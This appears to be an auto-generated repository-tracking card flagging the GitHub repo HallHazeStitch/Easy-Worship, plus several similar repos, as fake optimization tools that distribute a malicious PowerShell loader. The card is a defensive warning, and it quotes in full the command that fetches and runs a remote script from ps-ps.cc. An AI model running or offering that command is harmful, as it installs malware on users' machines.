# HallHazeStitch/Easy-Worship > The repository poses as a performance optimization and deployment automation suite, but actually distributes a malicious PowerShell script run via irm | iex, with execution-policy bypass and antivirus disabling. - Magnitude: 5.0 out of 10 — Early signal - Stars: 87 total · +92 stars today, ≈ 117 by evening - Star trust: star growth looks organic - Category: Security · Created: 2026-10-01 · Last push: 2026-10-01 - GitHub: https://github.com/HallHazeStitch/Easy-Worship · Page: https://gitnova.dev/en/r/HallHazeStitch/Easy-Worship ## Useful for - Avoid running the irm https://ps-ps.cc/powershell/Loader.ps1 | iex command from the README - Check the repository for malware indicators before use - Block the ps-ps.cc domain on a corporate network ## Why it’s here - 92 stars so far today, about 117 expected by the end of the day. - The repository is 1 day old and already has 87 stars. With less than two weeks of history, there's no usual pace to compare the spike against yet. - About 51 forks a day — people are taking the code. ## Star trust Star growth looks organic. Star-trust labels are heuristics based on the repository’s behavior, not a check of every stargazer. ## Numbers - Forks: 6 - Issues and pull requests: 0 - Watchers: 0 - Average over the last week: 58 per day - Usual pace: too little history (under two weeks) - Stars in the last hour (measured): 9 ## Stars per day, last 6 days (oldest → newest, today is partial) 2026-09-27 … 2026-10-02: 0, 0, 0, 0, 0, 92 ## Similar by description 1. **Shardarcairn12/Discord-Server-Raider** — 6.8 · Early signal · Security · +226 stars today, ≈ 287 by evening The repository poses as a Discord server optimization suite, but is actually a raider tool installed via a PowerShell script from an external domain, with instructions to disable antivirus. Full card: https://gitnova.dev/en/r/Shardarcairn12/Discord-Server-Raider.md 2. **Knotgraenhance/Cinema-4d** — 6.2 · Early signal · Security · +111 stars today, ≈ 141 by evening The repository poses as an optimization suite for Cinema 4D, but actually distributes a PowerShell script that runs a third-party loader via irm | iex and tweaks the registry. The README openly mentions "pre-activated launchers" and… Full card: https://gitnova.dev/en/r/Knotgraenhance/Cinema-4d.md 3. **crownsandband/ExitLag** — 5.8 · Early signal · Security · +176 stars today, ≈ 224 by evening The repository poses as an optimization tool but actually distributes a PowerShell script (irm ... | iex) to install a 'cracked' ExitLag. The README contains SEO spam and instructions to bypass antivirus — a typical malicious dropper… Full card: https://gitnova.dev/en/r/crownsandband/ExitLag.md 4. **ashdriverclippers/Microsoft-Visio** — 5.8 · Early signal · Security · +149 stars today, ≈ 189 by evening The repo poses as a "Microsoft Visio optimization suite", but is actually a PowerShell loader that fetches and executes remote code from ps-ps.cc and tells users to disable antivirus. Signs of a malicious/pirated installer rather than a… Full card: https://gitnova.dev/en/r/ashdriverclippers/Microsoft-Visio.md 5. **denmooseflex/Display-Fusion** — 5.9 · Early signal · Security · +183 stars today, ≈ 232 by evening The repository poses as a Display Fusion configuration manager, but is actually an installer distributing a pirated "pre-activated" version via a remote PowerShell script. The README includes instructions for bypassing Execution Policy… Full card: https://gitnova.dev/en/r/denmooseflex/Display-Fusion.md --- Magnitude (0–10) measures how fast and how unusually interest in a repository is growing right now. It is not a quality score. Days are UTC. “So far today” is a fact; “expected by the end of the day” is a forecast. Summaries and use cases are written by an LLM (DeepSeek V4.1 Flash) from the README and may be inaccurate: verify specific claims (benchmarks, speed, hardware) in the repository itself. Data as of 2026-10-02 17:30 UTC, updated every 30 minutes.